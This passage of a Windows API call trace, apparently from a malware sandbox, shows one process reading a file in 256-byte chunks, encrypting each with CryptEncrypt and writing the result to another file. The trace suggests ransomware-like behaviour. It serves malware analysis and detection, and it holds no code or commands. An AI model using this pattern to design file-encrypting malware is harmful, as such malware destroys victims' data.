lpOverlapped=0x0) returned 1 [0163.286] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.287] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.287] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.287] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.288] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.288] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.288] GetLastError () returned 0x0 [0163.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.289] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.289] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.289] GetLastError () returned 0x0 [0163.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.289] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.314] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.314] GetLastError () returned 0x0 [0163.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.314] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.314] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.314] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.315] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.315] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.315] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.315] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.315] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.315] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.315] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.315] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.315] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.315] GetLastError () returned 0x0 [0163.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.315] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.316] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.316] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.316] GetLastError () returned 0x0 [0163.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.317] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.317] GetLastError () returned 0x0 [0163.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.317] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 